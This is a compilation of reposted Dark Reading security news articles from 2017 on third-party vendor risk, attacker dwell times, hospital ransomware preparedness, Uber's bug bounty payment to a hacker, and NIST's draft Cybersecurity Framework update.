STE WILLIAMS

Depending on third parties is inescapable. Every organization needs software, hardware, Internet connectivity, power, and buildings. It’s unlikely they’re going to do all those things themselves. That means that organizations must be dependent on others outside themselves. With that dependence comes risk.

F5 recently partnered with Ponemon Institute to survey CISOs. In the report, The Evolving Role of CISOs and their Importance to the Business, CISOs were asked: Are your organization’s business partners, vendors, and other third parties held to high security standards? The responses:

• Always — 22%
• Yes, most of the time – 21%
• Yes, some of the time – 29%
• No – 28%

While 54% percent of the same survey respondents say they monitor third parties to ensure continued compliance with contractually required security requirements, only 21% say they hold third parties to a high security standard. Yet, interestingly, Beazley Insurance, in their breach insights blog from July 2017, reports that third-party suppliers account for 30% of breaches overall.

So, 28% of CISOs are ignoring 30% of their risk?

As my kids would say, “Seriously?”

To get some perspective, let’s look back at these serious security incidents from the past few years that involved third-party vendors:

• From August 2016 until March 2017, Sabre’s central reservation system, SynXis, which was being used by 100,0000 hotels and more than 70 airlines was hacked and users’ personal data accessed. Thousands of companies who used Sabre’s reservation system had to send out breach notices to their respective customers.
• In 2016, a compromise of “an unnamed third party” with remote access into Wendy’s point-of-sale system resulted in malware infecting over a thousand Wendy’s locations that stole customer payment card data.
• Hackers had access to an Experian server from 2013 until 2015, which provided them access to the credit check records of 15 million T-Mobile customers.
• The big story in third-party security is still Target. In 2013, cyber-crooks got in via an HVAC vendor and accessed data on 70 million customers. So far this has cost Target $202 million to clean up.

Who Are Third Parties?

• Any vendor, customer or partner whose security failure can lead to a security failure of any of your critical assets or systems
• Partners with direct access to your critical systems like building management firms, co-location facility providers, IT contractors, and off-site backup services
• Partners of critical dependencies such as Internet service providers, managed IT services vendors, and major software vendors
• Customers, business partners, and sub-tenants if they have network or physical access to your environment
• In many hospitals, internal clinics and medical service facilities are often run by different organizations than the encompassing hospital, yet they all often share the same network, which creates a patchwork of third-party security environments

Compliance Requirements on Third Parties
Managing third-party risk isn’t just a good idea, in many cases, it’s the law. Your organization is required to contractually obligate security and privacy measures of third parties’ access to sensitive data if you:

• Process personal data on EU citizens, per GDPR Article 28
• Collect, access, or process medical insurance data, per HIPAA privacy and security rules
• Collect or process payment card data, per PCI DSS
• Are a New York State bank, per the New York State Department of Financial Services

These are just the direct regulations, there are many more that specify third-party security oversight but don’t get into specific detailed requirements like American banks and publicly traded companies.

Third-Party Controls
What to do about controls? Let’s learn from our fellow CISOs, per the same F5 and Ponemon report. To start, you will need to establish a third-party security policy. This policy should always begin with a statement that  communicates to the entire organization (and regulators) what your official stance is regarding a particular risk. In this case, you need a policy that says that your organization recognizes risk from third parties and will measure and control it to an acceptable level. Here’s how the surveyed CISOs defined the baseline:

• 46% — Establish objective security requirements or protocols for third parties
• 34% — Establish security requirements and controls for cloud providers
• 33% — Establish security procedures to ensure that the supply chain is not corrupted, contaminated, or disruptive to business
• 27% — Establish a direct communication channel security and contracts/procurement

Set a Standard for Evaluating Third-Party Security
Now that you have a policy, which is a general statement, you need to bolster it with some details. This third-party standard establishes the baseline that third parties must meet, so communicate it to them before you have to rely on them. The standard also serves as the benchmark that your organization will use to measure the third-party security. According to the survey, 57% of respondents  suggest establishing a process for evaluating the security protection capability of third parties before engaging in business activities, while 52% recommend establishing a vetting process to ensure all third parties are evaluated and screened against objective security requirements.

Monitor Third-Party Security
With a policy and standard in place, now you can set up on-going processes to do that measuring and feedback. Survey results show that 54% of respondents monitor third parties to ensure continued compliance with contractually required security requirements while 44% say they periodically review third parties to objective security requirements.

Enforce Violations from Standard
It’s one thing to set policies and measure against standards, but you need to something with those results or it’s all a waste of time. According to the survey:

• 53% of respondents ensure compliance through third-party contracts that contain security, privacy, and responsibility/liability requirements in case of a breach
• 37% of respondents establish enforcement actions and termination penalties against third parties that fail to comply with security requirements
• 25% of respondents establish remediation procedures for third parties that fail to comply with security requirements

Hopefully we’ve spelled out the specifics you need to put together a complete third-party security framework for your organization. Note where your peers are going and make it happen.

Get the latest application threat intelligence from F5 Labs.

Raymond Pompon is a Principal Threat Researcher Evangelist with F5 labs. With over 20 years of experience in Internet security, he has worked closely with Federal law enforcement in cyber-crime investigations. He has recently written IT Security Risk Control Management: An … View Full Bio

Article source: https://www.darkreading.com/partner-perspectives/f5/why-third-party-security-is-your-security/a/d-id/1330552?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

It now takes an organization just under three months on average to detect hackers embedded in their network, a modest improvement over years past.

That’s one of the takeaways from data culled from 100 incident response investigations conducted by CrowdStrike this year. The security firm’s newly published Cyber Intrusion Services Casebook 2017 shows that organizations are getting a bit better at sniffing out attackers hiding out in their network over the previous two years, when the average so-called dwell time by an attacker was more than 100 days.

“Dwell time continues to be a problem. There’s a lot an adversary can do in 86 days,” says Bryan York, director of services for CrowdStrike. “It’s an improvement, but it’s still too long.”

York says organizations are gradually getting more visibility into activity in their networks, and that the security industry overall is doing a better job at integrating their different products via application programming interfaces. There also are better tools for correlating security data that speeds up response time, he notes, all of which help with detecting malicious activity.

CrowdStrike also saw an 11% increase in the number of cases where the victims spotted their own breach first, and didn’t have to hear it from the feds or a third party.

The longer a hacker remains inside a target’s network, the more damage he or she can do to steal information or disrupt the victim’s business. CrowdStrike’s team in its IR investigations also saw some shockingly long dwell times of 800 to 1,000 days in some cases, but those were “outliers,” according to CrowdStrike.

Meanwhile, most of the cases involved fileless malware attacks, aka malware-free attacks. Some 66% of the cases used these more camouflaged techniques to infiltrate their victim, such as employing legitimate Windows services for nefarious activity. Attackers employed stolen credentials, code execution in memory, Remote Desktop Protocol, WMI, PowerShell, and stolen virtual private network credentials, for example.

“These [attacks] are increasing in sophistication,” York says.

The most common initial attack vectors CrowdStrike saw in its client investigations were exploits against a Web server, Web application, and Web shells and file uploaders, 37%;  remote access (such as RDP, VPN), 23%; supply chain compromise, 12%; social engineering, phishing, or spear phishing, 11%; cloud-based service exploits, attacks against email portals, or other unauthorized access, 11%; and reconnaissance or other methods, 6%.

Wormables

But the new twist in 2017 attacks (think WannaCry and NotPetya) was self-spreading or self-propagating malware, a sort of new generation of the old network worm. Some of CrowdStrike’s clients suffered ransomware or other malware infections via this method, especially if they hadn’t kept their systems updated with the latest patches.

“We observed quite a few” of these types of attacks, York says. “A single system got infected with ransomware, and there was more propagation across the environment without any user interaction, or phishing,” etc., he says.

Much of the surge was courtesy of leaked NSA exploit kits EternalBlue and EternalRomance, which abuse Microsoft’s Server Message Block (SMB) protocol to spread malware within a network. Attackers behind WannaCry and NotPetya didn’t hesitate in weaponizing those tools to spread their ransomware.  

Much of the goal with these attacks has been destruction, for example, rather than monetary compensation, notes York. “We were involved with several companies whose businesses were halted because of those attacks,” he says.

“We really see destruction as a gamechanger moving forward.”

Related Content:

• 10 Scariest Ransomware Attacks of 2017
• NotPetya: How to Prep and Respond if You’re Hit
• Fileless Malware Takes 2016 By Storm
• NIST Releases New Cybersecurity Framework Draft

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/attacker-dwell-time-average-dips-slightly-to-86-days/d/d-id/1330580?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Like many couples, my wife and I enjoy watching TV dramas together. However, the recent winter finale of the long-running Grey’s Anatomy really hit home. It was about how the debilitating effects of a ransomware attack could leave a hospital and its patients at the mercy of attackers.

Natalie, my wife, is a pediatric intensivist (a doctor who works at an intensive care unit for children) and the chief medical information officer at Stanford Children’s Hospital. I am the chief risk officer and chief security officer at Neustar, a company that is responsible for Internet and telecommunication services, as well as solutions that prevent and mitigate the types of attacks depicted in Grey’s Anatomy.

Spoiler Alert!
Can hospitals really be taken offline, leaving critical support systems vulnerable and completely exposed to malicious actors? Or is this typical television hyperbole?

The harsh reality is that the producers of Grey’s Anatomy did their research and delivered a dramatized description of a threat that multiple different types of businesses, including healthcare organizations, have come to know all too well. We saw a real-life example of the potential danger with the WannaCry ransomware attack that crippled a hospital in the UK last May. No one is immune to ransomware attacks, but you can fend them off, defend your critical infrastructure, and prepare for emergencies like this through preventive measures and training.

As a CMIO and CRO/CSO couple, we both immediately thought about the extensive work our organizations undertake to prevent these types of attacks and to mitigate the effects if they happen. Proper patch management is key to preventing known attacks. A solid Web application firewall (WAF) can ensure that you have the latest patches, and it also prevents most types of attacks.

But what if this isn’t a known attack — what then? Business continuity management and disaster recovery are needed in that instance. Hospitals (and any IT system) should have backups and test these backups regularly. It is absolutely critical that health information technology departments closely monitor all of their critical systems, have backup copies of key information and systems, and have mitigation plans in place should any of those systems fail for any reason, including a cyberattack. In fact, many hospitals have complete duplicate copies of their entire electronic media record system in a location separate from the primary data storage site.

As we saw on television, Grey Sloan Memorial Hospital was locked out from accessing its electronic medical records. It could easily have been hit with a distributed denial-of-service (DDoS) attack as well. We have seen larger and larger DDoS attacks with the compromise of Internet of Things bots through Mirai. The hospital should ensure it has proper DDoS mitigation and a secondary DNS provider (should its primary DNS provider be attacked), and make sure that critical systems do not rely on third-party Internet access.

How Should a Hospital Respond in Real Life?
While Grey’s Anatomy was significantly overdramatized, this type of crisis can and does happen (as in the UK hospitals hit by the WannaCry attack). A cyberattack is an emergency that hospitals need to be prepared for as much as they are for any other type of emergency, such as natural disasters and mass casualties. Our healthcare information systems have become tightly integrated into patient care, so — just as on Grey’s Anatomy — younger physicians and staff members may not remember a time when they had to deliver care without these systems.

How does a health system prepare and respond? Planning, training, and practice. A hospital’s office of emergency management works closely with the IT department to ensure that it is prepared for exactly these types of emergencies. Alternative workflows must be identified ahead of time. Staff members must be routinely trained on how to use the downtime systems. Regular, planned system downtimes can be used for training, practice, and testing of the downtime systems. In severe emergencies, prioritization schemas should be used to ensure that critical resources are going to the most appropriate patients and that patients are diverted to other facilities when necessary.

We all love a good television drama to get our minds off of work and the stress of our everyday lives. However, Grey’s Anatomy is a stark reminder of the critical roles we play in our organizations and how important it is for everyone to prepare for the worst, so that we can be at our best if and when it happens.

Related Content:

• How to Make a Ransomware Payment – Fast
• Hacked IV Pumps and Digital Smart Pens Can Lead to Data Breaches
• Lethal Dosage of Cybercrime: Hacking the IV Pump
• GoT the Inside Threat: Compromised Insiders Make Powerful Adversaries

Tom serves as the CRO and CSO at Neustar, Inc. Prior to this role, he served as chief risk 0fficer and chief information security officer at DocuSign. While at JPMorgan Chase, Tom served as the deputy CISO, where he led cybersecurity, fraud prevention, and protective … View Full Bio

Article source: https://www.darkreading.com/risk/ransomware-meets-greys-anatomy/a/d-id/1330559?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Uber reportedly paid a 20-year-old Florida man behind its massive data breach $100,000 from its bug bounty program to keep mum about the cyberattack and to delete the stolen data.

A Reuters report quotes unnamed sources familiar with the breach event as saying that Uber paid the man in order to confirm his identity, and had him sign a nondisclosure agreement to prevent him from doing any further damage. Uber also performed a forensic investigation on the man’s computer to ensure he had deleted the stolen information.

The man reportedly paid another individual to steal Uber credentials from GitHub, which ultimately led to the Uber systems breach. According to a source quoted in the Reuters report, the man was “living with his mom in a small home trying to help pay the bills.”

Uber’s use of a bug bounty for the payment was an unusual move: bug bounty payments normally range from $5,000 to $10,000.

See Reuters’ full article here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/uber-used-$100k-bug-bounty-to-pay-silence-florida-hacker-report/d/d-id/1330584?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The National Institute of Standards and Technology (NIST) has released the second draft of a proposed update to the national Cybersecurity Framework of 2014.

The draft document contains important changes to some existing guidelines, especially around self-assessment of cybersecurity risk, and introduces some new ones pertaining to authorization, authentication, identity proofing, and vulnerability disclosure.  

NIST also released a proposed update to its Roadmap for Improving Critical Infrastructure Security that describes planned future activities and topics to focus on for upcoming versions of the framework.

The changes and refinements reflect feedback and comments from public and private sector stakeholders to an earlier draft update to the Cybersecurity Framework that NIST released in January 2017. NIST will make draft 2 of the Framework open for public comment through close of day January 19, 2018 and will likely go live with the changes shortly after.

“NIST is hoping Framework version 1.1 will lead to a greater consideration of supply chain risk management [SCRM], cybersecurity within SCRM, and application of [the] Framework for that cybersecurity,” says Matt Barrett, NIST’s lead on the framework.

The hope also is that the new self-assessment section and related topics in the Roadmap such as Governance and Enterprise Risk Management will prepare stakeholders for a discussion on how to better align cybersecurity measures to support business outcomes and decisions, he says.

NIST developed the Framework as required by the Cybersecurity Enhancement Act of 2014. It is designed to provide a formal framework for managing cyber risk in critical infrastructure organizations. The goal is to provide organizations in critical infrastructure with guidance on the processes, practices, and controls they can use to manage cyber risk in line with their business imperatives.

The Cybersecurity Framework establishes a common language for security models, practices, and controls across industries. At a high-level, the framework provides guidance on how organizations can identify, protect, detect, respond to, and recover from, cyber threats. It offers a tiered set of implementation practices that organizations can choose from to deploy and manage these capabilities. The methods, processes, and controls in the framework are based on globally accepted best practices and standards.

Mandatory for the Feds 

Until recently, adherence to the Framework was purely voluntary for everyone. But the Trump Administration’s Executive Order on Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure in May has now made it mandatory for federal agencies, Barrett says. The order required agency heads to provide a risk management report to the White House Office of Management and Budget describing their plans to implement the Framework, he says. Originally designed for use by operators and owners of critical infrastructure, the Framework has become a de facto standard for developing and implementing cyber-risk management practices at organizations across all sectors.

The new version clarifies some of the language around cybersecurity measurement and provides more guidance on managing cybersecurity within the supply chain — an issue that has become critical in recent years. It also explains how the framework can be used to mitigate risk in the Internet of Things (IoT), operational technology and cyber-physical systems environments. In addition, NIST’s updated Cybersecurity Framework makes some refinements to the identity and access management control category to accommodate changing requirements around authentication, authorization, and identity vetting.

“The NIST updates are meant to be a dynamic, working document,” says Edgard Capdevielle, CEO of Nozomi Networks. “[They] cover a lengthy list of topics from confidence mechanisms, cyberattack lifecycles, beefing up the cybersecurity workforce, to reviewing supply chain risk management along with governance and enterprise risk management.”

While critical infrastructures cannot adapt to all prescriptive guidance overnight, the framework serves as a good roadmap to start implementation of best practices, collaboration, and new security technologies, he says. 

“With Draft 2 of Version 1.1, I expect critical infrastructure operators and federal agencies to focus more closely on supply chain, especially as weak links there have contributed to several well-known data breaches,” says Robert Vescio, managing director at Secure Systems Innovation Corporation (SSIC). “To reduce the impact of cyber incidents, it is crucial that each and every organization understands its role within the larger ecosystem, and actively contributes to proactively address emerging threats.”

Vescio believes that while most organizations can benefit from the framework, adoption should remain voluntary. A forced adoption would destroy the concept of each organization tailoring security strategies to their risk appetite and lead to spending on irrelevant controls, he says.

“NIST CSF should be important to everyone,” he says.  “Implemented correctly, [it] can help organizations evolve, while maintaining or working toward a pre-selected risk posture.”

QA: Matt Barrett, NIST’s Lead on the CyberSecurity Framework

(Excerpts from a Dark Reading email interview with Matt Barrett)

Q. What are the most significant changes in this draft?

Firstly, Section 4.0, previously entitled Measuring and Demonstrating Cybersecurity, has been reframed as Self-Assessing Cybersecurity Risk with the Framework to better emphasize how organizations might use the Framework to measure their risk. In acknowledgement of the wide variety of stakeholder perspectives on cybersecurity measurement and the need for a stakeholder dialog on the topic, the section was summarized and refined and NIST officially acknowledged Measuring Cybersecurity as an item on the Roadmap to Improving Critical Infrastructure Cybersecurity.

NIST clarified the use of the Framework to manage cybersecurity within supply chains by refining Section 3.3 Communicating Cybersecurity Requirements with Stakeholders. This included a simpler description of the parties involved in an organizations supply chain. We also further integrated cyber supply chain risk management language into the Implementation Tiers. This will better enable organizations to determine their current status and desired state with regard to cyber supply chain risk management practices.

We added a few Subcategories to account for authentication and coordinated vulnerability disclosure.

Q. Are federal agencies/critical infrastructure operators required to adopt the framework?

Yes. On May 11, 2017, the President issued Executive Order on Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure. Among other things, the order states that “each agency head shall provide a risk management report to the Secretary of Homeland Security and the Director of the Office of Management and Budget (OMB) within 90 days of the date of this order” and “describe the agency’s action plan to implement the Framework.”

NIST issued draft report NIST Interagency Report (IR) 8170 to support agency heads and senior cybersecurity leadership in Framework implementation planning. The draft summarizes eight private sector uses of the Framework, which may be applicable for federal agencies. By leveraging NISTIR 8170, agencies can better understand how to implement the Framework in conjunction with other NIST cybersecurity risk management standards and guidelines.

Q. Going forward, do you expect agencies/CI operators to be assessed against their adherence or failure to adhere to the framework?

With increasing use of Framework, this topic increasingly comes up. Whether it will or won’t, NIST doesn’t have charter to control such things, nor latitude to comment. However, I will offer this up.

Given the increasing dependence of organizations on technology, digital trust is an increasingly important topic. In other words, not only does an organization need to manage their cybersecurity risk, but they also need to communicate it in various forms to suppliers, partners, customers, auditors, and regulators. Framework provides a basis for a standardized communication – increasing and organizations efficiency and reducing the chances of miscommunication – and it also provides the high-level methods of determining cybersecurity state, deciding desired state, and planning the improvements necessary to achieve the desired state. 

Organizations may elect to use Framework to self-assess cybersecurity risk and communicate judiciously with others. They may also enlist external parties to assess cybersecurity risk. For this reason, NIST continues to encourage and support private sector in evaluating and implementing Framework confidence mechanisms.

Q. How should organizations use the framework?

There are many ways to use Framework and all the varied uses have a value.Out-of-the-box and without alteration, Framework offers a common and accessible vocabulary for cybersecurity risk management. In its simplest form, that vocabulary is Identity, Protect, Detect, Respond, and Recover. This allows people who are not cybersecurity experts to participate in the cybersecurity dialog. 

The Framework is also meant to be customized for a given sector, subsector, or organization.  That customization ultimately means some form of prioritization. 

Framework has some native methods of customizing and prioritizing. For instance, Framework Profiles help an organization determine and communicate the outcomes that are most important for a given set of circumstances, whether those circumstances are derived from the technical environment, cybersecurity requirements such as law and regulation, or desired organizational objectives. Similarly, the Implementation Tiers of Framework help and organization decide how they would like to manage cybersecurity risk for a given part of the organization. 

Related Content:

• NIST Releases Cybersecurity Definitions for the Workforce
• NIST Cybersecurity Framework Adoption Hampered By Costs, Survey Finds
• NIST Releases Preliminary Cybersecurity Framework

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/cloud/nist-releases-new-cybersecurity-framework-draft/d/d-id/1330579?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple